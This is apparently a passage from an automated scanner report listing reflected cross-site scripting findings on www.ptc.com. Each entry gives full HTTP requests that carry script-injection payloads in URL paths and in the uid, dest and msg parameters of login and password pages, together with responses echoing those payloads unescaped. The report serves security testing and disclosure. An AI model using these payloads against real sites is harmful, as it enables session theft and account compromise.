<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions/index.htm35012"><script>alert(1)</script>54eb8923a0d">
...[SNIP]...

1.45. http://www.ptc.com/solutions/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/index.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 588da--><script>alert(1)</script>ce4b8696981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/index.htm588da--><script>alert(1)</script>ce4b8696981 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:17 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=B27D1E60B6C967615983579A1AE9537C.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45188
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:42 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /solutions/index.htm588da--><script>alert(1)</script>ce4b8696981-->
...[SNIP]...

1.46. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb759"><script>alert(1)</script>5a3e94b5ffd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutionsfb759"><script>alert(1)</script>5a3e94b5ffd/product-lifecycle-management HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:22 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=148F5FDECBA83A679880F7ED8F7B2347.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:47 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutionsfb759"><script>alert(1)</script>5a3e94b5ffd/product-lifecycle-management">
...[SNIP]...

1.47. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9a4bc--><script>alert(1)</script>5c603f3d7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions9a4bc--><script>alert(1)</script>5c603f3d7d/product-lifecycle-management HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:26 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=D470CAA25AFA9AEDA9A9FA3FAD3360B4.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:51 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /solutions9a4bc--><script>alert(1)</script>5c603f3d7d/product-lifecycle-management-->
...[SNIP]...

1.48. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b56"><script>alert(1)</script>7364e597544 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/product-lifecycle-management69b56"><script>alert(1)</script>7364e597544 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:29 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=316DDA5EDD831EA2D6DBA8BC32BA85B5.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:54 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions/product-lifecycle-management69b56"><script>alert(1)</script>7364e597544">
...[SNIP]...

1.49. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 575be--><script>alert(1)</script>f37e80dfff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/product-lifecycle-management575be--><script>alert(1)</script>f37e80dfff1 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:33 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=AD88B43002ED172E18EE8489D5F5A479.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44097
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:58 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /solutions/product-lifecycle-management575be--><script>alert(1)</script>f37e80dfff1-->
...[SNIP]...

1.50. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3"><script>alert(1)</script>866d7c41560 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutionscefc3"><script>alert(1)</script>866d7c41560/product-lifecycle-management/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:19 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=5A0335877ECA9193E8C8C3DC42AE6469.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:44 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutionscefc3"><script>alert(1)</script>866d7c41560/product-lifecycle-management">
...[SNIP]...

1.51. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 60da8--><script>alert(1)</script>4c4617073cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions60da8--><script>alert(1)</script>4c4617073cd/product-lifecycle-management/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:23 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=E1F6E5C9DF80ED0FC20824679C233A1D.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44097
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:48 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /solutions60da8--><script>alert(1)</script>4c4617073cd/product-lifecycle-management-->
...[SNIP]...

1.52. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7d5a4--><script>alert(1)</script>5b73a0137ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutions/product-lifecycle-management7d5a4--><script>alert(1)</script>5b73a0137ec/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:29 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=68811D3A5B6F3C8E8AF7DE881222BD57.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44097
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:54 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /solutions/product-lifecycle-management7d5a4--><script>alert(1)</script>5b73a0137ec-->
...[SNIP]...

1.53. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/product-lifecycle-management/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d37d6"><script>alert(1)</script>d017caaff81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/product-lifecycle-managementd37d6"><script>alert(1)</script>d017caaff81/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Solutions%20Home; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DSolutions%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/product-lifecycle-management%2526ot%253DA; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:25 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=2D4D5AE6D0B0507A26D6EDD6625536ED.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44095
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:50 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions/product-lifecycle-managementd37d6"><script>alert(1)</script>d017caaff81">
...[SNIP]...

1.54. https://www.ptc.com/appserver/common/account/password.jsp [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ptc.com
Path:   /appserver/common/account/password.jsp

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 203b6<script>alert(1)</script>f6446aa7f8f8b5a43 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /appserver/common/account/password.jsp?numTries=3&uid=xss203b6<script>alert(1)</script>f6446aa7f8f8b5a43 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.ptc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.ptc.com/appserver/common/account/password.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; JSESSIONID=2D0C96AD12D9D3C0D09DD30EDCDF94C0.hqjbsprd07-e; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturncanSubmit%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:05 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:30 GMT;path=/;secure
Content-Length: 31046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<link rel='stylesheet' href='/common/css/apps/wam.css' type='text/css'/>
<scri
...[SNIP]...
<b>xss203b6<script>alert(1)</script>f6446aa7f8f8b5a43</b>
...[SNIP]...

1.55. https://www.ptc.com/appserver/common/login/ssl/login.jsp [dest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ptc.com
Path:   /appserver/common/login/ssl/login.jsp

Issue detail

The value of the dest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d5d"><script>alert(1)</script>2dd33bf20e6 was submitted in the dest parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaqd2d5d"><script>alert(1)</script>2dd33bf20e6&msg=1 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:46 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:11 GMT;path=/;secure
Content-Length: 35409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com: Log In</titl
...[SNIP]...
rm-urlencoded" action="/appserver/auth/authenticate.jsp?dest=http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faqd2d5d"><script>alert(1)</script>2dd33bf20e6" name="secureLogin">
...[SNIP]...

1.56. https://www.ptc.com/appserver/common/login/ssl/login.jsp [msg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ptc.com
Path:   /appserver/common/login/ssl/login.jsp

Issue detail

The value of the msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee82"><script>alert(1)</script>212e8cc256d was submitted in the msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=11ee82"><script>alert(1)</script>212e8cc256d HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
